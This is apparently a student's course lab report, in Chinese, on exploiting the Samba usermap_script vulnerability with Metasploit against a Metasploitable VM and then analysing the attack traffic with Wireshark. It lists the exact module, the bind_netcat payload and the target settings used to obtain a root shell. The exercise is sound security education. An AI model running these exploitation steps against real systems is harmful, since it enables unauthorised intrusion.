20252907 2025-2026-2 《网络攻防实践》第七周作业
20252907 2025-2026-2 《网络攻防实践》第七周作业
1.实践内容
(1)使用Metasploit开展Linux远程渗透攻击
核心任务:运用Metasploit渗透测试工具,针对Linux靶机上Samba服务存在的Usermap_script安全漏洞实施渗透攻击,成功获取目标Linux靶机的主机访问权限。具体实践步骤如下:
- 启动Metasploit渗透测试软件,可根据个人操作习惯,选择msfconsole(命令行模式)、msfgui(图形界面模式)或msfweb(网页模式)中的任意一种启动方式。
- 加载渗透攻击模块,选用exploit/multi/samba/usermap_script模块,该模块专门用于利用Samba服务的Usermap_script漏洞进行攻击。
- 选择攻击载荷(PAYLOAD),确定使用远程Shell类型,正向连接或反向连接两种方式均可,可根据实际网络环境灵活选择。
- 配置渗透攻击相关参数,准确设置目标主机IP(RHOST)、本地主机IP(LHOST)、目标系统类型(TARGET)等关键参数,确保参数配置正确无误。
- 执行渗透攻击操作,启动攻击流程,密切观察攻击过程中的状态反馈。
- 验证攻击结果,检查是否成功获取目标主机的远程Shell,同时查看当前获得的主机访问权限等级,确认攻击效果。
(2)实践作业:攻防对抗实践
本次实践作业采用攻防对抗模式,分为攻击方与防守方两个角色,具体任务要求如下:
攻击方任务
使用Metasploit渗透测试工具,对Metasploitable靶机进行漏洞扫描与识别,选取靶机中存在的可利用漏洞实施渗透攻击,成功获取靶机的远程控制权后,进一步尝试提升权限,直至获得root超级用户权限。
防守方任务
使用tcpdump、wireshark或snort等网络监听与分析工具,对网络流量进行实时监听,捕获攻击过程中产生的所有数据包并保存为数据包文件。随后结合wireshark或snort工具对捕获的数据包进行深入分析,明确攻击相关关键信息,具体包括:攻击者IP地址、目标主机IP地址及攻击端口、攻击发起时间、攻击所利用的具体漏洞、攻击过程中使用的Shellcode,以及攻击成功后攻击者在靶机命令行中输入的所有操作指令信息。
2.实践过程
2.1 使用Metasploit进行Linux远程渗透攻击
首先启动Kali虚拟机与Metasploitable虚拟机,启动完成后,在两台虚拟机中分别执行对应命令查看其网络信息。经查看,Kali虚拟机的IP地址为192.168.200.7,Metasploitable虚拟机的IP地址为192.168.200.8。


使用ping命令检查二者的连通性,可以ping通说明连通性正常
然后在kali虚拟机中切换root权限后输入命令msfconsole启动Metasploit渗透软件

然后再输入命令search samba查找要使用的漏洞模块

输入命令search usermap_script查找到要使用的usermap_script安全漏洞

输入命令use exploit/multi/samba/usermap_script使用渗透攻击模块

输入命令show payloads查看与该渗透攻击模块相兼容的攻击载荷

输入命令set payload cmd/unix/bind_netcat设置攻击载荷为bind_netcat,输入命令options查看需配置的参数

输入命令与对应的靶机和攻击机IP地址,将Metasploitable虚拟机设置为靶机,将kali虚拟机设置为攻击机
set RHOST 192.169.200.8
set LHOST 192.168.200.7

输入exploit或run开始攻击,输入ifconfig查看网络信息,显示的是靶机的网络信息(IP地址192.168.200.8),攻击成功

2.2 攻防对抗实践
攻击方zyx's kali(192.168.200.7),防守方Metasploitable_ubuntu(192.168.200.8)
类似2.1当中的设置好靶机IP与攻击机IP后,打开wireshark准备抓包

输入exploit攻击成功后,wireshark监听到大量的网络流量数据包

依次输入命令shell和id查看shell权限账户及其所在的权限组

输入命令whoami查看到当前账户是root权限

在顶部过滤栏输入以下过滤语句,只显示攻击机与靶机之间的流量:
ip.addr == 192.168.200.7 && ip.addr == 192.168.200.8
从过滤后的流量中可以清晰看到:
- 源IP地址:192.168.200.7(攻击机)
- 目的IP地址:192.168.200.8(靶机)
- 目标端口:445(Samba服务默认端口)
- 主要协议:TCP、SMB协议
在数据包列表中找到包含SMB协议的核心攻击数据包,右键点击选择Follow→TCP Stream,追踪TCP流查看完整的攻击交互过程。
追踪数据流发现攻击机利用4444号端口与靶机建立telnet服务

继续追踪TCP数据流可以看到攻击后输入的指令信息

3.学习中遇到的问题及解决
-
问题1:使用exploit失败
![image-20260420151034867]()
-
问题1解决方案:ip设置错误,192.168.200.8,不小心打成了192.169.200.8
4.收获与总结
本次网络攻防实践中,我熟练掌握了 Metasploit 框架漏洞利用的基本流程,同时作为防守方,运用 tcpdump 和 Wireshark 捕获分析攻击流量,提升了对网络攻击本质及防御方法的认知。实验让我深刻意识到,未及时修补的老旧漏洞(如 Samba usermap_script 漏洞)仍会带来严重安全威胁,也让我明白及时打补丁、关闭无用服务是基础且重要的防护措施。此外,实验中排查问题的过程锻炼了我的解决问题能力,相较于实践六,我对相关工具的使用更加熟练,对攻防思路的理解也更为深刻。


浙公网安备 33010602011771号